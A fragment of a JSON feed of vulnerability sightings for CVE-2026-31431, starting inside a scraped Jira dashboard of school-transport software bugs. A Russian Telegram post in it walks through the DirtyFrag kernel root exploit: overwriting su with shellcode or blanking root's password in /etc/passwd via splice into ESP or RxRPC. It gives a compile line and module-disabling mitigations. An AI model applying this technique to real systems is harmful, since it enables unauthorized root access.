- Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 6, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26 (5d)\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (23d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (31d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (30d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (37d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (37d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (39d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (33d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (33d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (29d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (27d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (23d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (45d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (45d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1555\n                      [Houston-1.780] 500 internal server error for \"search\"call inside stop module\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (45d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 07, 2026 at 10:33 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-07T22:34:01.000000Z"}, {"uuid": "c117049a-41e7-4a5f-b5aa-be304dfb5e3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116535252477878449", "content": "CopyFail didn't affect Debian 12, and it has been said that this was not intentional, but rather due to an imcomplete backport\nInterestingly, Debian 12 is also seemingly unaffected by Dirty Frag as well.  (But Debian 11 and 13 are affected)\nI'm curious if the Debian 12 behavior is by accident.  \ud83e\udd14", "creation_timestamp": "2026-05-07T20:47:18.552036Z"}, {"uuid": "2ca3c728-48b5-453a-9bda-41d6704cfde4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83256", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a fix-cve-2026-3143\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ClimbMunchkin\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-07 19:58:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u0414\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0430 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2026-31431 (copy fail)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-07T20:00:04.000000Z"}, {"uuid": "e4ad9122-294b-4dc1-bd39-942d09d042b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/poxek/6065", "content": "\ud83e\udde0 \u041f\u043e\u043c\u043d\u0438\u0442\u0435 Copy Fail? \u0422\u0430\u043a \u0432\u043e\u0442, \u043d\u0430\u0448\u043b\u0438 \u0435\u0449\u0451 \u0434\u0432\u0430 \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u0434\u0435\u043b\u0430\u0442\u044c \u0442\u043e \u0436\u0435 \u0441\u0430\u043c\u043e\u0435\n\n\u041d\u0435\u0434\u0435\u043b\u044e \u043d\u0430\u0437\u0430\u0434 \u044f \u043f\u0438\u0441\u0430\u043b \u043f\u0440\u043e CVE-2026-31431 - 732 \u0431\u0430\u0439\u0442\u0430 Python \u0438 \u0442\u044b root. \u0411\u0430\u0433 \u0432 \u043a\u0440\u0438\u043f\u0442\u043e-\u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u0434\u0440\u0430, \u0447\u0435\u0440\u0435\u0437 splice() \u0438 page cache. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b - \u043d\u0443 \u043d\u0430\u0448\u043b\u0438, \u043d\u0443 \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u043b\u0438, \u0436\u0438\u0432\u0451\u043c \u0434\u0430\u043b\u044c\u0448\u0435\n\n\u0410 \u0432\u0447\u0435\u0440\u0430 V4bel \u0432\u044b\u043a\u0430\u0442\u0438\u043b DirtyFrag. \u0414\u0432\u0430 \u043d\u043e\u0432\u044b\u0445 \u0431\u0430\u0433\u0430 \u0442\u043e\u0433\u043e \u0436\u0435 \u043a\u043b\u0430\u0441\u0441\u0430. \u0422\u043e\u0442 \u0436\u0435 \u043f\u0440\u0438\u043d\u0446\u0438\u043f - \u0447\u0435\u0440\u0435\u0437 splice() \u0437\u0430\u0433\u043e\u043d\u044f\u0435\u043c \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u0444\u0430\u0439\u043b\u0430 \u0432 \u044f\u0434\u0435\u0440\u043d\u0443\u044e \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044e, \u044f\u0434\u0440\u043e \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \"\u043d\u0430 \u043c\u0435\u0441\u0442\u0435\" \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043f\u0440\u044f\u043c\u043e \u0432 page cache. \u0422\u043e\u043b\u044c\u043a\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u043d\u0435 \u0447\u0435\u0440\u0435\u0437 AF_ALG, \u0430 \u0447\u0435\u0440\u0435\u0437 \u0434\u0432\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u043e\u0434\u0443\u043b\u044f - ESP (IPsec) \u0438 RxRPC\n\n \ud83d\udc40 \u0414\u0432\u0430 \u043f\u0443\u0442\u0438 \u043a root. \u0412\u044b\u0431\u0438\u0440\u0430\u0439 \u043a\u0430\u043a\u043e\u0439 \u043d\u0440\u0430\u0432\u0438\u0442\u0441\u044f\n\n\u041f\u0435\u0440\u0432\u044b\u0439 - \u0447\u0435\u0440\u0435\u0437 ESP. \u0421\u043e\u0437\u0434\u0430\u0451\u043c XFRM-\u0430\u0441\u0441\u043e\u0446\u0438\u0430\u0446\u0438\u044e \u0441 UDP-\u0438\u043d\u043a\u0430\u043f\u0441\u0443\u043b\u044f\u0446\u0438\u0435\u0439, \u0437\u0430\u0441\u043e\u0432\u044b\u0432\u0430\u0435\u043c \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b /usr/bin/su \u0432 \u043f\u0430\u0439\u043f\u043b\u0430\u0439\u043d \u0447\u0435\u0440\u0435\u0437 splice(), \u044f\u0434\u0440\u043e \u0434\u0435\u043b\u0430\u0435\u0442 in-place \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u0438 \u043f\u0438\u0448\u0435\u0442 4 \u0431\u0430\u0439\u0442\u0430 \u043a\u0443\u0434\u0430 \u043c\u044b \u0441\u043a\u0430\u0436\u0435\u043c. \u041f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u043c - \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c 192-\u0431\u0430\u0439\u0442\u043d\u044b\u0439 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u043f\u043e\u0432\u0435\u0440\u0445 su. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c su - \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c root. \u0417\u0432\u0443\u0447\u0438\u0442 \u0437\u043d\u0430\u043a\u043e\u043c\u043e? \u042d\u0442\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0442\u043e\u0442 \u0436\u0435 \u043f\u0430\u0442\u0442\u0435\u0440\u043d, \u0447\u0442\u043e \u0438 Copy Fail, \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u0434\u0440\u0443\u0433\u0443\u044e \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443. \u0411\u0430\u0433 \u0432 \u044f\u0434\u0440\u0435 \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2017 \u0433\u043e\u0434\u0430\n\n\u0412\u0442\u043e\u0440\u043e\u0439 - \u0447\u0435\u0440\u0435\u0437 RxRPC, \u0438 \u0432\u043e\u0442 \u0442\u0443\u0442 \u043a\u0440\u0430\u0441\u0438\u0432\u043e. \u0412\u043c\u0435\u0441\u0442\u043e \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u0430 - \u043f\u0430\u0442\u0447\u0438\u043c /etc/passwd. \u0421\u043e\u0437\u0434\u0430\u0451\u043c rxkad-\u0442\u043e\u043a\u0435\u043d \u0441 \u043d\u0443\u0436\u043d\u044b\u043c \u043a\u043b\u044e\u0447\u043e\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f, \u044f\u0434\u0440\u043e \u0447\u0435\u0440\u0435\u0437 rxkad_verify_packet_1() \u0434\u0435\u043b\u0430\u0435\u0442 pcbc(fcrypt) \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u043f\u0440\u044f\u043c\u043e \u043f\u043e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u0444\u0430\u0439\u043b\u0430. \u0422\u0440\u0438 splice-\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0441 \u043f\u0435\u0440\u0435\u043a\u0440\u044b\u0442\u0438\u0435\u043c - \u0438 \u0441\u0442\u0440\u043e\u043a\u0430 root:x:0:0: \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432 root::0:0:. \u041f\u0443\u0441\u0442\u043e\u0439 \u043f\u0430\u0440\u043e\u043b\u044c. su root, Enter, \u0432\u0441\u0451. \u041f\u0440\u0438\u0447\u0451\u043c \u043d\u0443\u0436\u043d\u044b\u0439 \u043a\u043b\u044e\u0447 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u0431\u0438\u0440\u0430\u0435\u0442\u0441\u044f \u0432 \u044e\u0437\u0435\u0440\u0441\u043f\u0435\u0439\u0441\u0435 - \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0444\u043b\u0430\u0439\u043d, \u0431\u0435\u0437 \u0435\u0434\u0438\u043d\u043e\u0433\u043e \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043a \u044f\u0434\u0440\u0443. \u041e\u0434\u0438\u043d \u0434\u0435\u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0442\u0440\u0438\u0433\u0433\u0435\u0440 \u0432 \u043a\u043e\u043d\u0446\u0435. \u042d\u0442\u043e\u0442 \u0431\u0430\u0433 \u0441 \u0438\u044e\u043d\u044f 2023 \u0433\u043e\u0434\u0430\n\n\u041d\u0438 \u043e\u0434\u043d\u043e\u0439 \u0433\u043e\u043d\u043a\u0438. \u041d\u0438 \u043e\u0434\u043d\u043e\u0433\u043e race condition. \u0414\u0435\u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043b\u043e\u0433\u0438\u043a\u0430 - \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u043b \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b, \u0434\u0451\u0440\u043d\u0443\u043b \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443, page cache \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u043d. \u0415\u0441\u043b\u0438 \u0447\u0442\u043e-\u0442\u043e \u043f\u043e\u0448\u043b\u043e \u043d\u0435 \u0442\u0430\u043a - \u044f\u0434\u0440\u043e \u043d\u0435 \u043f\u0430\u0434\u0430\u0435\u0442, \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c\n\n\u041f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043e \u043d\u0430 Ubuntu 24.04, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44. \u041a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043e\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439: \n\n\ngcc -O0 -Wall -o exp exp.c -lutil\n\n\n\u0418 \u0432\u043e\u0442 \u0442\u0443\u0442 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435 - CVE \u043d\u0435\u0442. \u041f\u0430\u0442\u0447\u0430 \u043d\u0435\u0442. \u041d\u0438 \u0434\u043b\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430. \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u0441\u043b\u043e\u043c\u0430\u043b \u044d\u043c\u0431\u0430\u0440\u0433\u043e \u0434\u043e \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0432\u0435\u043d\u0434\u043e\u0440\u044b \u0443\u0441\u043f\u0435\u043b\u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u0442\u044c \u0444\u0438\u043a\u0441\u044b. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0441\u0432\u044f\u0437\u0430\u043b\u0441\u044f \u0441 linux-distros@openwall, \u0442\u0435 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0442\u044c - \u0438 \u043e\u043d \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b. \u041f\u043e\u043b\u043d\u044b\u0439 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a, \u043a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u044f, \u0437\u0430\u043f\u0443\u0441\u043a. \u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 - zero-day \u0432 \u0447\u0438\u0441\u0442\u043e\u043c \u0432\u0438\u0434\u0435\n\n\u0427\u0442\u043e \u043c\u044b \u0438\u043c\u0435\u0435\u043c. Dirty Pipe \u0432 2022 - page cache \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0439\u043f\u044b. Copy Fail \u043d\u0435\u0434\u0435\u043b\u044e \u043d\u0430\u0437\u0430\u0434 - page cache \u0447\u0435\u0440\u0435\u0437 AF_ALG. DirtyFrag \u0432\u0447\u0435\u0440\u0430 - page cache \u0447\u0435\u0440\u0435\u0437 ESP \u0438 RxRPC. \u0422\u0440\u0438 \u0440\u0430\u0437\u043d\u044b\u0445 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u0431\u0430\u0433-\u043a\u043b\u0430\u0441\u0441. \u042f\u0434\u0440\u043e Linux \u043f\u043e\u043b\u043d\u043e \u043c\u0435\u0441\u0442, \u0433\u0434\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0435\u043b\u0430\u044e\u0442\u0441\u044f \u00ab\u043d\u0430 \u043c\u0435\u0441\u0442\u0435\u00bb \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0437 splice(). \u041a\u0430\u0436\u0434\u043e\u0435 \u0442\u0430\u043a\u043e\u0435 \u043c\u0435\u0441\u0442\u043e - \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u0432 page cache. \u0421\u043a\u043e\u043b\u044c\u043a\u043e \u0435\u0449\u0451 \u0442\u0430\u043a\u0438\u0445 \u043c\u0435\u0441\u0442 \u0432 \u044f\u0434\u0440\u0435 - \u0432\u043e\u043f\u0440\u043e\u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439. \u041f\u043e\u0434\u043e\u0437\u0440\u0435\u0432\u0430\u044e - \u043d\u0435 \u043c\u0430\u043b\u043e \ud83d\udc40\n\n\n\u041c\u0438\u0442\u0438\u0433\u0430\u0446\u0438\u044f \u043f\u0440\u044f\u043c\u043e \u0441\u0435\u0439\u0447\u0430\u0441 (\u043f\u0430\u0442\u0447\u0430-\u0442\u043e \u043d\u0435\u0442):\n\n\nprintf 'install esp4 /bin/false\\ninstall esp6 /bin/false\\ninstall rxrpc /bin/false\\n' > /etc/modprobe.d/dirtyfrag.conf\nrmmod esp4 esp6 rxrpc 2>/dev/null\n\n\n\u0427\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043b\u043e\u043c\u0430\u0442\u044c\u0441\u044f - ESP \u043c\u043e\u0434\u0443\u043b\u0438 \u043d\u0443\u0436\u043d\u044b \u0434\u043b\u044f IPsec VPN. \u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 site-to-site IPsec \u0438\u043b\u0438 strongSwan - \u043f\u043e\u0434\u0443\u043c\u0430\u0439\u0442\u0435 \u0434\u0432\u0430\u0436\u0434\u044b. RxRPC \u043d\u0430 Ubuntu \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e, \u043d\u043e 